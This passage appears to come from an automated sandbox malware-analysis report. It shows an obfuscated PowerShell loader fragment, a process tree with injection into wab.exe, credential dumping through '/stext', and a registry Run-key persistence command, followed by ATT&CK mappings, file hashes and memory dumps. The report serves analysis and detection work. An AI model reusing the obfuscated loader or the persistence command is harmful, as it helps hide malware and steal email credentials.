ov(coron.tTRyghvireFolkekusskubor,tHesitat-InformaPmismateaeksistetReequiphOfayscr Landsk$Trff.lsNFlyvereeAdo neddCellefogPsychoprKuglefoaKirurgevAs,hete)Misplan ');while (!$Lejevrdiernes129) {Xylyl (Mikado 'Sande,e$Basitemg Af,nnelStoushcoCivildobVerdensaDemilitlStartko:CongregtLark.omrdaisyssy ppositk aftrripEpisiorlH rmitia SekunddDizequ,eAf entnrTyvebetsMancipa=unstout$Afprikkt SupranrSamsvaruk,ittede Ejeste ') ;Xylyl $Akrobat;Xylyl (Mikado 'JdesmicSCe ebrotScrollea,inemasrLaughert aparth-Cardi pSKastanil Skak pe.atamane CostaepMrkbar Prostat4 fistul ');Xylyl (Mikado 'Bevogtn$ untasegBarse,vlTurdansoDosmersbBlegnetaLandingl Assent:Oste.naLHarrowmeSamucanjSmithieeO strukvPerfectr Indruld EchinoiOttili eHysterirU,seignnSyleconeUnexpersTys hed1 Co ege2Stangsp9Rastpla=Kryptis(Engra nTRenskreeSuperins CirkattPriserk-UtaalelP systema DoitsptHenvejrh .omspr Intervi$undespoNPerisyse BambusdNabogitgDebindsrKulturfaHidrrtev Pepton)fdninge ') ;Xylyl (Mikado 'beskfti$smre rag Igua.olap roaco H vnebbSanseapaSfartsblUndisag:Intour.HLsbarhejLitteraoEpi,hylr ThumbptEfterree S,prantFruitwoaSemi,bskFrem.rek LyskureSn bsninOvercom=Bl mmes$ SkaldygB.adgullOverwaro elelitbSkyllevaMisprovl Flydev:Imp rraU DejlignMesomordSpagheteSonogr,rIdeeltscViljeslrkammerje TilskasUdtrykstUerstat1Dackeri6Diedric0 Landst+Engleli+ Eart.m% A,etyl$pupilsbDTjenesti BalkarsGipsd.pk .rikkeoBac risgGopurakrResoluta .rydsff SukkeriSlutfass .lycopkSkibskie NoncussSnkning.KedushacbyudvikoPentecouSanguifn agpiedtSelvris ') ;$Spinituberculate=$Diskografiskes[$Hjortetakken];}$Forlngelseslovs=308238;$udenlandsdanskerne=30330;Xylyl (Mikado 'Nidoros$Er oldeg MilliblLiberalo Ch omebMetzgonaUndervalSimulat:SintredLToppunkvBronzeveparadism CollecaJan.erkn KidnapkWarehoueOveracurRntgenfnFarvetaeMercato Begrudg=Galagal Eje ahoGScalenoeGeneraltSubprep-MusedesC Lsr,fooLimen,enD.scocat,emisapecoronitnJagten.tI.terfi Multiv$Syrer iNAchesove Fo,srgd BaccalgThromborlienteraSagprosvfarvepr ');Xylyl (Mikado 'Syp.ere$Pros,avgAftvinglcibariooUformaabfremelsaBet linlR,stjer: Lrre,sUEsk,ldsn AnskuebPreplacrT,ssesuoSpildola Ra,pedc Mi,ieuha.simileKana iedKommise Blodser=Unhypot Kilomol[.epleteS Pentagy Bobes.sStegenetValvulae talblomInterre.aneurinC Lrest,oUbefjednPlastikvLskedr.e oolierrSolmodntHaglgev] Hypos :,rocivi: Sk,mplF etrolar.dringsogracioum JumperBAfterdaaGadel usIndenrieprogram6icteric4 VinderS Granult Sulphar IncaseiLondonen Nonparg Hovedr(persona$BautastLTaxaudlvTranspieSleth gmW.ltonbaMo phinnSanseorkAgariciejazzmusr MatsornBeregnieDiethyl)Skibspr ');Xylyl (Mikado 'Nove,in$StoachsgRevokselSystemeoGra.ciabIsomer.aEnfoldil gifted:Overh nUManicurrAgentureTempyogdUnrollme,ksekvetZin,ify edisma=Glycero Mollusc[UrgoniaSSin ulayNoncancsForetyptOverproeOveri.ym Kryd h.TelotreT R bstieEkviperx Sprogft L poli.bevilliEMatchsanBevislicSystempoBe onardForskriiM,lticonHalshvigTacheom]Acervat: ster,l:SolospiASpinketSM toposCbuskrseI,etoolsIBestykn.LavatoeG egisteedisapprtUds,yknS NondiftBo.tlbnrDa regniPhenospn rdigmogStikfor(Stuearr$TilhyllULegaliznliannatbNonsimurSpaanplo TophueaStanke,c Xip.ochmakro aeSmovsetd,ecolor)Hng,nde ');Xylyl (Mikado 'Klatvas$ryg,adeg StaveslYeom,nloAutomobbBestia a un.labl Telefo: ummertBTroloveeFakticir .esvrlibudg tslKassebgdUdgiftssElektro=Mistill$ Zamar,UOutbo,ir PestereGau.sfid Knarkee evaport T resn.ElixatisNoninteu OphidsbCuticulsN,ncommtinvent rSp.rrowiPsykotene,evatogRitu,li( Penepl$ ci iusFF,nansloHydrolorBrndk mlMelolonnTrst,trg.kftedeeSankthalDia,kopsS,beslaeF ockres enckesl MaadenoSwazilnvAngelihsSalgsch,Lutoses$NattelyuAs icsmdco,certeComputenSlvtjsslPostulaanontra.nHj.rnevdEncolors AnguludR,eoptaa mmersenParrings afspilkErkendeeSinopiarKorr,mpnGulfedpeTonomet)grund t ');Xylyl $Berilds;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2004

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Contributors.Pap && echo t"
4⤵
PID:3180

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:780

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slidfladerne" /t REG_EXPAND_SZ /d "%Skovbyggelinjernes% -w 1 $Slutvrdier=(Get-ItemProperty -Path 'HKCU:\Rewets\').Cavilingness;%Skovbyggelinjernes% ($Slutvrdier)"
5⤵
- Suspicious use of WriteProcessMemory
PID:1620

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slidfladerne" /t REG_EXPAND_SZ /d "%Skovbyggelinjernes% -w 1 $Slutvrdier=(Get-ItemProperty -Path 'HKCU:\Rewets\').Cavilingness;%Skovbyggelinjernes% ($Slutvrdier)"
6⤵
- Adds Run key to start application
- Modifies registry key
PID:1612

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\lbkfseagjtgchdwxpfxeyfliojsqbu"
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1624

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\vdxqtwkaxbyhjrkbzpkgbsgzxpbruffuy"
5⤵
PID:3952

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\vdxqtwkaxbyhjrkbzpkgbsgzxpbruffuy"
5⤵
PID:3284

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\vdxqtwkaxbyhjrkbzpkgbsgzxpbruffuy"
5⤵
PID:3932

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\vdxqtwkaxbyhjrkbzpkgbsgzxpbruffuy"
5⤵
- Accesses Microsoft Outlook accounts
PID:3456

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\yxdiu"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1656

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4068 --field-trial-handle=2256,i,6670388345726423024,18382795228658886258,262144 --variations-seed-version /prefetch:8
1⤵
PID:3956

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_31l1ivk4.fix.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\lbkfseagjtgchdwxpfxeyfliojsqbu
Filesize
4KB

MD5
10fa8ec140c204486092fb161e567ec7

SHA1
4d63e1f8df3afefedb19df73d7ee5f3b1e7b6473

SHA256
7176ca3d0196ec46f178107fdb587adaef3f6ea65daa80eccd2371a515880e04

SHA512
9db4eeb3f07d8d0579f75f3426c91156809152d8c1a37c9a27bf159888f6dd97f1212ac80f5bbb17e4d86f3087c512ccba2ca50a2db07d071370bd36364e1f76

Download Submit
C:\Users\Admin\AppData\Roaming\Contributors.Pap
Filesize
440KB

MD5
6d3d810b1b531a393dd8a200f17378b8

SHA1
bc31c057297d2b467a46d843030f1ff377f55f1e

SHA256
786447c3a5269cec661eb9e7bea51a58df805afaceb116677ff1974cc0d6d7df

SHA512
a77ecb7cc1d0bb183fdef43747f7156bd72e5fcb32e2e8c7671a926707b313245e08b682ce03b6b862f9f4ff1f62cf566d98fbde3384c67b60c0a2cb8dcbf358

Download Submit
memory/780-47-0x00000000022E0000-0x00000000037D1000-memory.dmp

Filesize
20.9MB

Download
memory/780-77-0x000000001F900000-0x000000001F919000-memory.dmp

Filesize
100KB

Download
memory/780-78-0x000000001F900000-0x000000001F919000-memory.dmp

Filesize
100KB

Download
memory/780-74-0x000000001F900000-0x000000001F919000-memory.dmp

Filesize
100KB

Download
memory/780-46-0x0000000001080000-0x00000000022D4000-memory.dmp

Filesize
18.3MB

Download
memory/1624-62-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1624-54-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1624-59-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1656-58-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1656-56-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1656-60-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2004-37-0x0000000007D30000-0x0000000007DC6000-memory.dmp

Filesize
600KB

Download
memory/2004-33-0x0000000006A70000-0x0000000006A8E000-memory.dmp

Filesize
120KB

Download
memory/2004-35-0x0000000008290000-0x000000000890A000-memory.dmp

Filesize
6.5MB

Download
memory/2004-36-0x0000000007B20000-0x0000000007B3A000-memory.dmp

Filesize
104KB

Download
memory/2004-16-0x00000000030C0000-0x00000000030F6000-memory.dmp

Filesize
216KB

Download
memory/2004-38-0x0000000007CC0000-0x0000000007CE2000-memory.dmp

Filesize
136KB

Download
memory/2004-39-0x0000000008EC0000-0x0000000009464000-memory.dmp

Filesize
5.6MB

Download
memory/2004-20-0x0000000005B80000-0x0000000005BA2000-memory.dmp

Filesize
136KB

Download
memory/2004-42-0x0000000009470000-0x000000000A961000-memory.dmp

Filesize
20.9MB

Download
memory/2004-28-0x00000000063D0000-0x0000000006724000-memory.dmp

Filesize
3.3MB

Download
memory/2004-22-0x00000000062E0000-0x0000000006346000-memory.dmp

Filesize
408KB

Download
memory/2004-34-0x0000000006CF0000-0x0000000006D3C000-memory.dmp

Filesize
304KB

Download
memory/2004-21-0x0000000006270000-0x00000000062D6000-memory.dmp

Filesize
408KB

Download
memory/2004-19-0x0000000005BD0000-0x00000000061F8000-memory.dmp

Filesize
6.2MB

Download
memory/3092-17-0x00007FF97B673000-0x00007FF97B675000-memory.dmp

Filesize
8KB

Download
memory/3092-18-0x00007FF97B670000-0x00007FF97C131000-memory.dmp

Filesize
10.8MB

Download
memory/3092-50-0x00007FF97B670000-0x00007FF97C131000-memory.dmp

Filesize
10.8MB

Download
memory/3092-0-0x00007FF97B673000-0x00007FF97B675000-memory.dmp

Filesize
8KB

Download
memory/3092-13-0x00007FF97B670000-0x00007FF97C131000-memory.dmp

Filesize
10.8MB

Download
memory/3092-12-0x00007FF97B670000-0x00007FF97C131000-memory.dmp

Filesize
10.8MB

Download
memory/3092-11-0x00007FF97B670000-0x00007FF97C131000-memory.dmp

Filesize
10.8MB

Download
memory/3092-6-0x000002A39FB40000-0x000002A39FB62000-memory.dmp

Filesize
136KB

Download
memory/3456-55-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3456-57-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3456-61-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download